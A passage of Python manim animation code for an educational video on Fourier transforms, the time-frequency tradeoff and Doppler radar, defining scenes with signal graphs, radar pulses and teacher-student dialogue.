FadeOut(com_dot.length_label_group),\n Animation(line),\n ShowCreation(arc),\n Write(theta)\n )\n self.play(\n Rotate(\n VGroup(line, com_dot),\n angle, about_point = ORIGIN\n ),\n Transform(arc, alt_arc),\n theta.move_to, 1.5*alt_arc.point_from_proportion(0.5),\n rate_func = there_and_back,\n run_time = 4\n )\n self.wait()\n\nclass AskAboutLongVsShort(TeacherStudentsScene):\n def construct(self):\n self.student_says(\n \"What happens if we \\\\\\\\ change the length of \\\\\\\\ the signal?\",\n index = 2,\n )\n self.play(\n self.teacher.change, \"happy\",\n self.change_students(\"pondering\", \"confused\", \"raise_right_hand\")\n )\n self.wait(5)\n\nclass LongAndShortSignalsInWindingMachine(FourierRecapScene):\n CONFIG = {\n \"num_fourier_graph_points\" : 1000,\n }\n def construct(self):\n self.setup_axes()\n self.extend_for_long_time()\n self.note_sharp_fourier_peak()\n self.very_short_signal()\n self.note_wide_fourier_peak()\n\n def setup_axes(self):\n FourierRecapScene.setup_axes(self)\n self.add(self.circle_plane)\n self.add(self.frequency_axes)\n self.time_graph = self.graph = self.get_time_graph(width = 2)\n self.add(self.time_graph)\n\n self.force_skipping()\n self.wrap_signal_around_circle()\n\n fourier_graph = self.get_fourier_transform_graph(self.time_graph)\n self.fourier_graph = fourier_graph\n self.add(fourier_graph)\n self.change_frequency(5)\n\n self.revert_to_original_skipping_status()\n\n def extend_for_long_time(self):\n short_time_graph = self.time_graph\n long_time_graph = self.get_time_graph(\n width = 10,\n num_graph_points = 500,\n )\n long_time_graph.set_stroke(width = 2)\n new_freq = 5.1\n long_pol_graph = self.get_polarized_mobject(\n long_time_graph,\n freq = 
new_freq\n )\n fourier_graph = self.fourier_graph\n\n self.change_frequency(new_freq)\n self.play(\n FadeOut(self.graph),\n FadeOut(self.graph.polarized_mobject),\n FadeOut(fourier_graph)\n )\n self.play(\n ShowCreation(long_time_graph, rate_func=linear),\n ShowCreation(long_pol_graph, rate_func=linear),\n run_time = 5\n )\n self.wait()\n\n self.time_graph = self.graph = long_time_graph\n\n def note_sharp_fourier_peak(self):\n fourier_graph = self.get_fourier_transform_graph(\n self.time_graph, \n num_graph_points = self.num_fourier_graph_points\n )\n self.fourier_graph = fourier_graph\n self.note_fourier_peak(fourier_graph, 5, 5.1)\n\n def very_short_signal(self):\n time_graph = self.time_graph\n fourier_graph = self.fourier_graph\n short_time_graph = self.get_time_graph(width = 0.6)\n new_freq = 5.1\n short_pol_graph = self.get_polarized_mobject(\n short_time_graph,\n freq = new_freq\n )\n\n self.play(\n FadeOut(fourier_graph),\n FadeOut(time_graph),\n FadeOut(time_graph.polarized_mobject),\n )\n self.play(\n ShowCreation(short_time_graph),\n ShowCreation(short_time_graph.polarized_mobject),\n )\n self.graph = self.time_graph = short_time_graph\n self.change_frequency(6.66, run_time = 5)\n\n def note_wide_fourier_peak(self):\n fourier_graph = self.get_fourier_transform_graph(\n self.graph, \n num_graph_points = self.num_fourier_graph_points\n )\n self.fourier_graph = fourier_graph\n self.note_fourier_peak(fourier_graph, 5, 6.66)\n\n\n ###\n\n def note_fourier_peak(self, fourier_graph, freq1, freq2):\n fourier_graph = self.fourier_graph\n dots = self.get_fourier_graph_dots(fourier_graph, freq1, freq2)\n self.get_center_of_mass_dot()\n self.generate_center_of_mass_dot_update_anim()\n self.generate_fourier_dot_transform(fourier_graph)\n dot = self.fourier_graph_dot\n arrow = Arrow(UP, ORIGIN, buff = SMALL_BUFF)\n arrow.next_to(dot, UP, buff = SMALL_BUFF)\n\n self.play(ShowCreation(fourier_graph))\n self.change_frequency(freq1,\n added_anims = [\n MaintainPositionRelativeTo(arrow, dot),\n UpdateFromAlphaFunc(\n arrow,\n lambda m, a : m.set_fill(opacity = a)\n ),\n ],\n run_time = 3,\n )\n self.wait()\n self.change_frequency(freq2,\n added_anims = [\n MaintainPositionRelativeTo(arrow, dot)\n ],\n run_time = 3\n )\n self.wait()\n self.play(*list(map(FadeOut, [\n dot, arrow, self.center_of_mass_dot\n ])))\n #This is not great...\n for attr in \"center_of_mass_dot\", \"fourier_graph_dot\":\n self.__dict__.pop(attr)\n\n\n def get_fourier_graph_dots(self, fourier_graph, *freqs):\n axis_point = self.frequency_axes.coords_to_point(4.5, -0.25)\n dots = VGroup()\n for freq in freqs:\n point = self.frequency_axes.input_to_graph_point(freq, fourier_graph)\n dot = Dot(point)\n dot.scale(0.5)\n dots.add(dot)\n vect = point - axis_point\n vect *= 1.3/get_norm(vect)\n arrow = Arrow(vect, ORIGIN, buff = SMALL_BUFF)\n arrow.set_color(YELLOW)\n arrow.shift(point)\n dot.arrow = arrow\n return dots\n\nclass FocusRectangleInsert(FourierRecapScene):\n CONFIG = {\n \"target_width\" : 0.5\n }\n def construct(self):\n self.setup_axes()\n self.clear()\n point = self.frequency_axes.coords_to_point(5, 0.25)\n rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)\n rect.set_stroke(YELLOW, 2)\n self.add(rect)\n self.wait()\n self.play(\n rect.stretch_to_fit_width, self.target_width,\n rect.stretch_to_fit_height, 1.5,\n rect.move_to, point,\n run_time = 2\n )\n self.wait(3)\n\nclass BroadPeakFocusRectangleInsert(FocusRectangleInsert):\n CONFIG = {\n \"target_width\" : 1.5,\n }\n\nclass 
CleanerFourierTradeoff(FourierTradeoff):\n CONFIG = {\n \"show_text\" : False,\n \"complex_to_real_func\" : lambda z : z.real,\n \"widths\" : [0.02, 6, 1],\n }\n\nclass MentionDopplerRadar(TeacherStudentsScene):\n def construct(self):\n words = OldTexText(\"Doppler Radar\")\n words.next_to(self.teacher, UP)\n words.save_state()\n words.shift(DOWN).fade(1)\n dish = RadarDish()\n dish.next_to(self.students, UP, buff = 2, aligned_edge = LEFT)\n plane = Plane()\n plane.to_edge(RIGHT)\n plane.align_to(dish)\n always_shift(plane, LEFT, 1)\n plane.flip()\n pulse = RadarPulse(dish, plane)\n look_at_anims = [\n Mobject.add_updater(\n pi, lambda pi : pi.look_at(pulse.mobject)\n )\n for pi in self.get_pi_creatures()\n ]\n\n self.add(dish, plane, pulse, *look_at_anims)\n self.play(\n self.teacher.change, \"hooray\",\n words.restore\n )\n self.play_student_changes(\"pondering\", \"erm\", \"sassy\")\n self.wait(2)\n self.play(\n self.teacher.change, \"happy\",\n self.change_students(*[\"thinking\"]*3)\n )\n self.wait()\n dish.set_stroke(width = 0)\n self.play(UpdateFromAlphaFunc(\n VGroup(plane, dish),\n lambda m, a : m.set_fill(opacity = 1 - a)\n ))\n\nclass IntroduceDopplerRadar(Scene):\n CONFIG = {\n \"frequency_spread_factor\" : 100,\n }\n def construct(self):\n self.setup_axes()\n self.measure_distance_with_time()\n self.show_frequency_shift()\n self.show_frequency_shift_in_fourier()\n\n def setup_axes(self):\n self.dish = RadarDish()\n self.dish.to_corner(UP+LEFT)\n axes = Axes(\n x_min = 0,\n x_max = 10,\n y_min = -1.5,\n y_max = 1.5\n )\n axes.move_to(DOWN)\n time_label = OldTexText(\"Time\")\n time_label.next_to(axes.x_axis.get_right(), UP)\n axes.time_label = time_label\n axes.add(time_label)\n self.axes = axes\n\n self.add(self.dish)\n self.add(axes)\n\n def measure_distance_with_time(self):\n dish = self.dish\n axes = self.axes\n distance = 5\n time_diff = 5\n speed = (2*distance)/time_diff\n randy = Randolph().flip()\n randy.match_height(dish)\n randy.move_to(dish.get_right(), LEFT)\n randy.shift(distance*RIGHT)\n\n pulse_graph, echo_graph, sum_graph = \\\n self.get_pulse_and_echo_graphs(\n self.get_single_pulse_graph,\n (1,), (1+time_diff,)\n )\n words = [\"Original signal\", \"Echo\"]\n for graph, word in zip([pulse_graph, echo_graph], words):\n arrow = Vector(DOWN)\n arrow.next_to(graph.peak_point, UP, SMALL_BUFF)\n arrow.match_color(graph)\n graph.arrow = arrow\n label = OldTexText(word)\n label.next_to(arrow.get_start(), UP, SMALL_BUFF)\n label.match_color(graph)\n graph.label = label\n\n double_arrow = DoubleArrow(\n pulse_graph.peak_point,\n echo_graph.peak_point,\n color = WHITE\n )\n distance_text = OldTexText(\"$2 \\\\times$ distance/(signal speed)\")\n distance_text.set_width(0.9*double_arrow.get_width())\n distance_text.next_to(double_arrow, UP, SMALL_BUFF)\n\n #v_line anim?\n\n pulse = RadarPulseSingleton(\n dish, randy, \n speed = 0.97*speed, #Just needs slightly better alignment\n )\n graph_draw = turn_animation_into_updater(\n ShowCreation(\n sum_graph, \n rate_func=linear, \n run_time = 0.97*axes.x_max\n )\n )\n randy_look_at = Mobject.add_updater(\n randy, lambda pi : pi.look_at(pulse.mobject)\n )\n axes_anim = ContinualAnimation(axes)\n\n self.add(randy_look_at, axes_anim, graph_draw)\n self.wait(0.5)\n self.add(pulse)\n self.play(\n Write(pulse_graph.label),\n GrowArrow(pulse_graph.arrow),\n run_time = 1,\n )\n self.play(randy.change, \"pondering\")\n self.wait(time_diff - 2)\n self.play(\n Write(echo_graph.label),\n GrowArrow(echo_graph.arrow),\n run_time = 1\n )\n 
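# Aside: measure_distance_with_time above encodes the ranging relation behind the
# "2*distance/(signal speed)" label: the echo returns only after the pulse covers
# the distance twice, so delay = 2*distance/speed, i.e. distance = speed*delay/2.
# A tiny worked check using the scene's own numbers (distance 5, delay 5, speed 2):
def echo_delay(distance, speed):
    return 2.0 * distance / speed

def distance_from_delay(delay, speed):
    return 0.5 * speed * delay

assert echo_delay(distance=5, speed=2) == 5.0
assert distance_from_delay(delay=5, speed=2) == 5.0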
self.wait()\n self.play(\n GrowFromCenter(double_arrow),\n FadeIn(distance_text)\n )\n self.wait()\n\n self.remove(graph_draw, pulse, randy_look_at, axes_anim)\n self.add(axes)\n self.play(LaggedStartMap(FadeOut, VGroup(\n sum_graph, randy,\n pulse_graph.arrow, pulse_graph.label,\n echo_graph.arrow, echo_graph.label,\n double_arrow, distance_text\n )))\n\n def show_frequency_shift(self):\n axes = self.axes\n dish = self.dish\n plane = Plane()\n plane.flip()\n plane.move_to(dish)\n plane.to_edge(RIGHT)\n\n time_diff = 6\n\n pulse_graph, echo_graph, sum_graph = graphs = \\\n self.get_pulse_and_echo_graphs(\n self.get_frequency_pulse_graph,\n (1,25), (1+time_diff,50)\n )\n for graph in graphs:\n graph.set_stroke(width = 3)\n signal_graph = self.get_frequency_pulse_graph(1)\n\n pulse_brace = Brace(Line(ORIGIN, RIGHT), UP)\n pulse_brace.move_to(axes.coords_to_point(1, 1.2))\n echo_brace = pulse_brace.copy()\n echo_brace.stretch(0.6, 0)\n echo_brace.move_to(axes.coords_to_point(7, 1.2))\n pulse_text = pulse_brace.get_text(\"Original signal\")\n pulse_text.add_background_rectangle()\n echo_text = echo_brace.get_text(\"Echo\")\n echo_subtext = OldTexText(\"(Higher frequency)\")\n echo_subtext.next_to(echo_text, RIGHT)\n echo_subtext.match_color(echo_graph)\n\n graph_draw = turn_animation_into_updater(\n ShowCreation(sum_graph, run_time = 8, rate_func=linear)\n )\n pulse = RadarPulse(dish, plane, n_pulse_singletons = 12)\n always_shift(plane, LEFT, 1.5)\n\n self.add(graph_draw, pulse, plane)\n self.play(UpdateFromAlphaFunc(\n plane, lambda m, a : m.set_fill(opacity = a)\n ))\n self.play(\n GrowFromCenter(pulse_brace),\n FadeIn(pulse_text),\n )\n self.wait(3)\n self.play(\n GrowFromCenter(echo_brace),\n GrowFromCenter(echo_text),\n )\n self.play(UpdateFromAlphaFunc(\n plane, lambda m, a : m.set_fill(opacity = 1-a)\n ))\n #Only for when -s is run\n graph_draw.update(10) \n self.wait(0.1)\n self.play(Write(echo_subtext, run_time = 1))\n self.wait()\n self.remove(graph_draw, pulse, plane)\n\n pulse_graph.set_stroke(width = 0)\n echo_graph.set_stroke(width = 0)\n self.time_graph_group = VGroup(\n axes, pulse_brace, pulse_text,\n echo_brace, echo_text, echo_subtext,\n pulse_graph, echo_graph, sum_graph,\n )\n self.set_variables_as_attrs(*self.time_graph_group)\n\n def show_frequency_shift_in_fourier(self):\n sum_graph = self.sum_graph\n pulse_graph = self.pulse_graph\n pulse_label = VGroup(self.pulse_brace, self.pulse_text)\n echo_graph = self.echo_graph\n echo_label = VGroup(\n self.echo_brace, self.echo_text, self.echo_subtext\n )\n\n #Setup all fourier graph stuff\n f_max = 0.02\n frequency_axes = Axes(\n x_min = 0, x_max = 20,\n x_axis_config = {\"unit_size\" : 0.5},\n y_min = -f_max, y_max = f_max,\n y_axis_config = {\n \"unit_size\" : 50,\n \"tick_frequency\" : 0.01,\n },\n )\n frequency_axes.move_to(self.axes, LEFT)\n frequency_axes.to_edge(DOWN)\n frequency_label = OldTexText(\"Frequency\")\n frequency_label.next_to(\n frequency_axes.x_axis.get_right(), UP,\n )\n frequency_label.to_edge(RIGHT)\n frequency_axes.add(frequency_label)\n\n for graph in pulse_graph, echo_graph, sum_graph:\n graph.fourier_transform = get_fourier_graph(\n frequency_axes, graph.underlying_function,\n frequency_axes.x_min, 25,\n complex_to_real_func = abs,\n )\n\n #Braces labeling F.T.\n original_fourier_brace = Brace(\n Line(\n frequency_axes.coords_to_point(7, 0.9*f_max),\n frequency_axes.coords_to_point(9, 0.9*f_max),\n ),\n UP,\n ).set_color(BLUE)\n echo_fourier_brace = Brace(\n Line(\n 
frequency_axes.coords_to_point(14, 0.4*f_max),\n frequency_axes.coords_to_point(18, 0.4*f_max),\n ),\n UP,\n ).set_color(YELLOW)\n # braces = [original_fourier_brace, echo_fourier_brace]\n # words = [\"original signal\", \"echo\"]\n # for brace, word in zip(braces, words):\n # brace.add(brace.get_text(\"F.T. of \\\\\\\\ %s\"%word))\n fourier_label = OldTex(\"||\\\\text{Fourier transform}||\")\n # fourier_label.next_to(sum_graph.fourier_transform, UP, MED_LARGE_BUFF)\n fourier_label.next_to(frequency_axes.y_axis, UP, buff = SMALL_BUFF)\n fourier_label.shift_onto_screen()\n fourier_label.set_color(RED)\n\n\n #v_lines\n v_line = DashedLine(\n frequency_axes.coords_to_point(8, 0),\n frequency_axes.coords_to_point(8, 1.2*f_max),\n color = YELLOW,\n dash_length = 0.025,\n )\n v_line_pair = VGroup(*[\n v_line.copy().shift(u*0.6*RIGHT)\n for u in (-1, 1)\n ])\n v_line = VGroup(v_line)\n\n double_arrow = DoubleArrow(\n frequency_axes.coords_to_point(8, 0.007),\n frequency_axes.coords_to_point(16, 0.007),\n buff = 0,\n color = WHITE\n )\n\n self.play(\n self.time_graph_group.to_edge, UP,\n ApplyMethod(\n self.dish.shift, 2*UP, \n remover = True\n ),\n FadeIn(frequency_axes)\n )\n self.wait()\n self.play(\n FadeOut(sum_graph),\n FadeOut(echo_label),\n pulse_graph.set_stroke, {\"width\" : 3},\n )\n self.play(\n ReplacementTransform(\n pulse_label[0].copy(),\n original_fourier_brace\n ),\n ShowCreation(pulse_graph.fourier_transform)\n )\n self.play(Write(fourier_label))\n self.wait()\n self.play(ShowCreation(v_line))\n self.wait()\n self.play(ReplacementTransform(v_line, v_line_pair))\n self.wait()\n self.play(FadeOut(v_line_pair))\n self.wait()\n\n self.play(\n FadeOut(pulse_graph),\n FadeIn(sum_graph),\n ReplacementTransform(\n pulse_graph.fourier_transform,\n sum_graph.fourier_transform\n )\n )\n self.play(FadeIn(echo_label))\n self.play(ReplacementTransform(\n echo_label[0].copy(),\n echo_fourier_brace,\n ))\n self.wait(2)\n self.play(GrowFromCenter(double_arrow))\n self.wait()\n\n\n ###\n\n def get_graph(self, func, **kwargs):\n graph = self.axes.get_graph(func, **kwargs)\n graph.peak_point = self.get_peak_point(graph)\n return graph\n\n def get_single_pulse_graph(self, x, **kwargs):\n return self.get_graph(self.get_single_pulse_function(x), **kwargs)\n\n def get_single_pulse_function(self, x):\n return lambda t : -2*np.sin(10*(t-x))*np.exp(-100*(t-x)**2)\n\n def get_frequency_pulse_graph(self, x, freq = 50, **kwargs):\n return self.get_graph(\n self.get_frequency_pulse_function(x, freq), \n num_graph_points = 700,\n **kwargs\n )\n\n def get_frequency_pulse_function(self, x, freq):\n factor = self.frequency_spread_factor\n return lambda t : op.mul(\n 2*np.cos(2*freq*(t-x)),\n min(np.exp(-(freq**2/factor)*(t-x)**2), 0.5)\n )\n\n def get_peak_point(self, graph):\n anchors = graph.get_anchors()\n return anchors[np.argmax([p[1] for p in anchors])]\n\n def get_pulse_and_echo_graphs(self, func, args1, args2):\n pulse_graph = func(*args1, color = BLUE)\n echo_graph = func(*args2, color = YELLOW)\n sum_graph = self.axes.get_graph(\n lambda x : sum([\n pulse_graph.underlying_function(x),\n echo_graph.underlying_function(x),\n ]),\n num_graph_points = echo_graph.get_num_curves(),\n color = WHITE\n )\n sum_graph.background_image_file = \"blue_yellow_gradient\"\n return pulse_graph, echo_graph, sum_graph\n\nclass DopplerFormulaInsert(Scene):\n def construct(self):\n formula = OldTex(\n \"f_{\\\\text{echo}}\", \"=\",\n \"\\\\left(1 + \\\\frac{v}{c}\\\\right)\",\n \"f_{\\\\text{pulse}}\"\n )\n 
formula[0].set_color(BLUE)\n formula[3].set_color(YELLOW)\n\n randy = Randolph(color = BLUE_C)\n formula.scale(1.5)\n formula.next_to(randy, UP+LEFT)\n formula.shift_onto_screen()\n\n self.add(randy)\n self.play(\n LaggedStartMap(FadeIn, formula),\n randy.change, \"pondering\", randy.get_bottom(),\n )\n self.play(Blink(randy))\n self.wait(2)\n self.play(Blink(randy))\n self.wait()\n\nclass MentionPRFNuance(TeacherStudentsScene):\n def construct(self):\n title = OldTexText(\n \"Speed of light\", \"$\\\\gg$\", \"Speed of a plane\"\n )\n title.to_edge(UP)\n self.add(title)\n\n axes = self.axes = Axes(\n x_min = 0, x_max = 10,\n y_min = 0, y_max = 2,\n )\n axes.next_to(title, DOWN, buff = MED_LARGE_BUFF)\n frequency_label = OldTexText(\"Frequency\")\n frequency_label.scale(0.7)\n frequency_label.next_to(axes.x_axis.get_right(), UP)\n axes.add(frequency_label)\n self.add(axes)\n\n pulse_x, shift_x = 4, 6\n pulse_graph = self.get_spike_graph(pulse_x)\n shift_graph = self.get_spike_graph(shift_x)\n shift_graph.set_stroke(YELLOW, 2)\n peak_points = VGroup(pulse_graph.peak_point, shift_graph.peak_point)\n self.add(pulse_graph)\n\n brace = Brace(peak_points, UP, buff = SMALL_BUFF)\n displayed_doppler_shift = OldTexText(\"How I'm showing the \\\\\\\\\", \"Doppler shift\")\n actual_doppler_shift = OldTexText(\"Actual\\\\\\\\\", \"Doppler shift\")\n doppler_shift_words = VGroup(displayed_doppler_shift, actual_doppler_shift)\n doppler_shift_words.set_color(YELLOW)\n doppler_shift_words.scale(0.75)\n displayed_doppler_shift.next_to(brace, UP, buff = SMALL_BUFF)\n actual_doppler_shift.move_to(pulse_graph.peak_point)\n actual_doppler_shift.align_to(displayed_doppler_shift)\n\n self.play(\n Animation(pulse_graph),\n self.teacher.change, \"raise_right_hand\", \n run_time = 1\n )\n self.play(\n ShowCreation(shift_graph),\n FadeIn(brace),\n Write(displayed_doppler_shift, run_time = 1),\n self.change_students(*3*[\"sassy\"]),\n )\n self.play(\n UpdateFromAlphaFunc(\n shift_graph, \n lambda g, a : Transform(\n g, self.get_spike_graph(\n interpolate(shift_x, pulse_x+0.01, a),\n ).match_style(shift_graph)\n ).update(1),\n ),\n UpdateFromFunc(\n brace,\n lambda b : b.match_width(\n peak_points, stretch = True\n ).next_to(peak_points, UP, SMALL_BUFF)\n ),\n Transform(\n displayed_doppler_shift, actual_doppler_shift,\n rate_func = squish_rate_func(smooth, 0.3, 0.6)\n ),\n run_time = 3\n )\n self.wait(2)\n\n everything = VGroup(\n title,\n axes, pulse_graph, shift_graph,\n brace, displayed_doppler_shift\n )\n rect = SurroundingRectangle(everything, color = WHITE)\n everything.add(rect)\n\n self.teacher_says(\n \"I'll ignore certain \\\\\\\\ nuances for now.\",\n target_mode = \"shruggie\",\n added_anims = [\n everything.scale, 0.4,\n everything.to_corner, UP+LEFT,\n UpdateFromAlphaFunc(\n rect, lambda m, a : m.set_stroke(width = 2*a)\n )\n ],\n )\n self.play_student_changes(*3*[\"hesitant\"])\n self.wait(2)\n\n\n\n\n def get_spike_graph(self, x, color = RED, **kwargs):\n graph = self.axes.get_graph(\n lambda t : np.exp(-10*(t-x)**2)*np.cos(10*(t-x)),\n color = color,\n **kwargs\n )\n graph.peak_point = VectorizedPoint(self.axes.input_to_graph_point(x, graph))\n graph.add(graph.peak_point)\n return graph\n\nclass TimeAndFrequencyGivePositionAndVelocity(IntroduceDopplerRadar):\n def construct(self):\n x = 7\n freq = 25\n\n axes = self.axes = Axes(\n x_min = 0, x_max = 10,\n y_min = -2, y_max = 2,\n )\n axes.center()\n title = OldTexText(\"Echo signal\")\n title.next_to(axes.y_axis, UP)\n axes.add(title)\n 
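# Aside: MentionPRFNuance above is about scale. Because the speed of light dwarfs
# any aircraft speed, the true Doppler shift is minuscule compared with how the
# scenes draw it. Plugging assumed example numbers into the one-way formula from
# DopplerFormulaInsert, f_echo = (1 + v/c) * f_pulse:
c = 3.0e8        # speed of light, m/s
v = 250.0        # assumed airliner-ish speed, m/s
f_pulse = 1.0e9  # assumed 1 GHz radar carrier
f_echo = (1 + v / c) * f_pulse
print(f_echo - f_pulse)              # shift of roughly 833 Hz
print((f_echo - f_pulse) / f_pulse)  # fractional shift ~8.3e-7, far too small to draw to scale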
axes.to_edge(UP)\n graph = self.get_frequency_pulse_graph(x = x, freq = freq)\n graph.background_image_file = \"blue_yellow_gradient\"\n\n arrow = Arrow(\n axes.coords_to_point(0, -1.5),\n axes.coords_to_point(x, -1.5),\n color = WHITE,\n buff = SMALL_BUFF,\n )\n time = OldTexText(\"Time\")\n time.next_to(arrow, DOWN, SMALL_BUFF)\n\n delta_x = 0.7\n brace = Brace(\n Line(\n axes.coords_to_point(x-delta_x, 1), \n axes.coords_to_point(x+delta_x, 1)\n ),\n UP\n )\n frequency = OldTexText(\"Frequency\")\n frequency.set_color(YELLOW)\n frequency.next_to(brace, UP, SMALL_BUFF)\n\n time_updown_arrow = OldTex(\"\\\\Updownarrow\")\n time_updown_arrow.next_to(time, DOWN, SMALL_BUFF)\n freq_updown_arrow = time_updown_arrow.copy()\n freq_updown_arrow.next_to(frequency, UP, SMALL_BUFF)\n distance = OldTexText(\"Distance\")\n distance.next_to(time_updown_arrow, DOWN, SMALL_BUFF)\n velocity = OldTexText(\"Velocity\")\n velocity.next_to(freq_updown_arrow, UP, SMALL_BUFF)\n VGroup(freq_updown_arrow, velocity).match_style(frequency)\n\n self.add(axes)\n self.play(ShowCreation(graph))\n self.play(\n GrowArrow(arrow),\n LaggedStartMap(FadeIn, time, run_time = 1)\n )\n self.play(\n GrowFromCenter(brace),\n LaggedStartMap(FadeIn, frequency, run_time = 1)\n )\n self.wait()\n self.play(\n GrowFromPoint(time_updown_arrow, time_updown_arrow.get_top()),\n ReplacementTransform(\n time.copy().fade(1), \n distance\n )\n )\n self.play(\n GrowFromPoint(freq_updown_arrow, freq_updown_arrow.get_top()),\n ReplacementTransform(\n frequency.copy().fade(1), \n velocity\n )\n )\n self.wait()\n\nclass RadarOperatorUncertainty(Scene):\n def construct(self):\n dish = RadarDish()\n dish.scale(3)\n dish.move_to(4*RIGHT + 2*DOWN)\n dish_words = OldTexText(\"3b1b industrial \\\\\\\\ enterprises\")\n dish_words.scale(0.25)\n dish_words.set_stroke(BLACK, 0.5)\n dish_words.set_color(BLACK)\n dish_words.move_to(dish, DOWN)\n dish_words.shift(SMALL_BUFF*(UP+2*LEFT))\n dish.add(dish_words)\n randy = Randolph()\n randy.next_to(dish, LEFT, aligned_edge = DOWN)\n bubble = randy.get_bubble(\n width = 7,\n height = 4,\n )\n\n echo_object = Square()\n echo_object.move_to(dish)\n echo_object.shift(FRAME_X_RADIUS*RIGHT)\n pulse = RadarPulse(dish, echo_object, speed = 6)\n\n plane = Plane().scale(0.5)\n plane.move_to(bubble.get_bubble_center()+LEFT)\n plane_cloud = ProbabalisticMobjectCloud(\n plane, \n fill_opacity = 0.3,\n n_copies = 10,\n )\n plane_gdw = plane_cloud.gaussian_distribution_wrapper\n\n vector_cloud = ProbabalisticVectorCloud(\n center_func = plane_gdw.get_center,\n )\n vector_gdw = vector_cloud.gaussian_distribution_wrapper\n vector_gdw.scale(0.05)\n vector_gdw.move_to(plane_gdw)\n vector_gdw.shift(2*RIGHT)\n\n self.add(randy, dish, bubble, plane_cloud, pulse)\n self.play(randy.change, \"confused\")\n self.wait(3)\n self.add(vector_cloud)\n for i in range(3):\n for plane_factor, vector_factor, freq in (0.05, 10, 0.01), (20, 0.1, 0.1):\n pulse.internal_time = 0\n pulse.frequency = freq\n self.play(\n randy.change, \"pondering\", plane,\n plane_gdw.scale, plane_factor,\n vector_gdw.scale, vector_factor,\n )\n self.wait(2)\n\nclass AmbiguityInLongEchos(IntroduceDopplerRadar, PiCreatureScene):\n CONFIG = {\n \"object_x_coords\" : [7, 4, 6, 9, 8],\n \"frequency_spread_factor\" : 200,\n \"n_pulse_singletons\" : 16,\n \"pulse_frequency\" : 0.025,\n }\n def construct(self):\n self.setup_axes()\n self.setup_objects()\n self.send_long_pulse_single_echo()\n self.introduce_multiple_objects()\n self.use_short_pulse()\n 
self.fourier_transform_of_one_pulse()\n self.show_echos_of_moving_objects()\n self.overlapping_frequenies_of_various_objects()\n self.echos_of_long_pure_signal_in_frequency_space()\n self.concentrated_fourier_requires_long_time()\n\n def setup_axes(self):\n axes = self.axes = Axes(\n x_min = 0, x_max = 10,\n y_min = -1.5, y_max = 1.5,\n )\n time_label = OldTexText(\"Time\")\n time_label.next_to(axes.x_axis.get_right(), UP)\n axes.add(time_label)\n axes.center()\n axes.shift(DOWN)\n self.add(axes)\n\n dish = self.dish = RadarDish()\n dish.move_to(axes, LEFT)\n dish.to_edge(UP, buff = LARGE_BUFF)\n self.add(dish)\n\n def setup_objects(self):\n objects = self.objects = VGroup(\n Plane().flip(),\n SVGMobject(\n file_name = \"blimp\", \n color = BLUE_C,\n height = 0.5,\n ),\n SVGMobject(\n file_name = \"biplane\", \n color = RED_D,\n height = 0.5,\n ),\n SVGMobject(\n file_name = \"helicopter\", \n color = GREY_B,\n height = 0.5,\n ).rotate(-TAU/24),\n FalconHeavy(),\n )\n y_shifts = [0.25, 0, 0.5, 0.25, -0.5]\n for x, y, obj in zip(self.object_x_coords, y_shifts, objects):\n obj.move_to(self.axes.coords_to_point(x, 0))\n obj.align_to(self.dish)\n obj.shift(y*UP)\n\n self.object_velocities = [\n 0.7*LEFT,\n 0.1*RIGHT,\n 0.4*LEFT,\n 0.4*RIGHT,\n 0.5*UP,\n ]\n\n def send_long_pulse_single_echo(self):\n x = self.object_x_coords[0]\n plane = self.objects[0]\n self.add(plane)\n randy = self.pi_creature\n self.remove(randy)\n\n pulse_graph = self.get_frequency_pulse_graph(x)\n pulse_graph.background_image_file = \"blue_yellow_gradient\"\n\n pulse = self.get_pulse(self.dish, plane)\n\n brace = Brace(\n Line(\n self.axes.coords_to_point(x-1, 1),\n self.axes.coords_to_point(x+1, 1),\n ), UP\n )\n words = brace.get_text(\"Spread over time\")\n\n self.add(pulse)\n self.wait()\n squished_rate_func = squish_rate_func(smooth, 0.6, 0.9)\n self.play(\n ShowCreation(pulse_graph, rate_func=linear),\n GrowFromCenter(brace, rate_func = squished_rate_func),\n Write(words, rate_func = squished_rate_func),\n run_time = 3,\n )\n self.remove(pulse)\n self.play(FadeIn(randy))\n self.play(PiCreatureBubbleIntroduction(\n randy, \"Who cares?\",\n bubble_type = ThoughtBubble,\n bubble_config = {\n \"direction\" : LEFT,\n \"width\" : 2,\n \"height\": 1.5,\n },\n target_mode = \"maybe\",\n look_at = brace,\n ))\n self.play(Blink(randy))\n self.play(LaggedStartMap(\n FadeOut, VGroup(\n randy.bubble, randy.bubble.content, \n brace, words,\n )\n ))\n\n self.curr_graph = pulse_graph\n\n def introduce_multiple_objects(self):\n objects = self.objects\n x_coords = self.object_x_coords\n curr_graph = self.curr_graph\n randy = self.pi_creature\n\n graphs = VGroup(*[\n self.get_frequency_pulse_graph(x)\n for x in x_coords\n ])\n graphs.set_color_by_gradient(BLUE, YELLOW)\n sum_graph = self.axes.get_graph(\n lambda t : sum([\n graph.underlying_function(t)\n for graph in graphs\n ]),\n num_graph_points = 1000\n )\n\n noise_function = lambda t : np.sum([\n 0.5*np.sin(f*t)/f \n for f in (2, 3, 5, 7, 11, 13)\n ])\n noisy_graph = self.axes.get_graph(\n lambda t : sum_graph.underlying_function(t)*(1+noise_function(t)),\n num_graph_points = 1000\n )\n for graph in sum_graph, noisy_graph:\n graph.background_image_file = \"blue_yellow_gradient\"\n\n pulses = self.get_pulses()\n\n self.play(\n LaggedStartMap(GrowFromCenter, objects[1:]),\n FadeOut(curr_graph),\n randy.change, \"pondering\"\n )\n self.add(*pulses)\n self.wait(0.5)\n self.play(\n ShowCreation(\n sum_graph,\n rate_func=linear,\n run_time = 3.5,\n ),\n randy.change, \"confused\"\n 
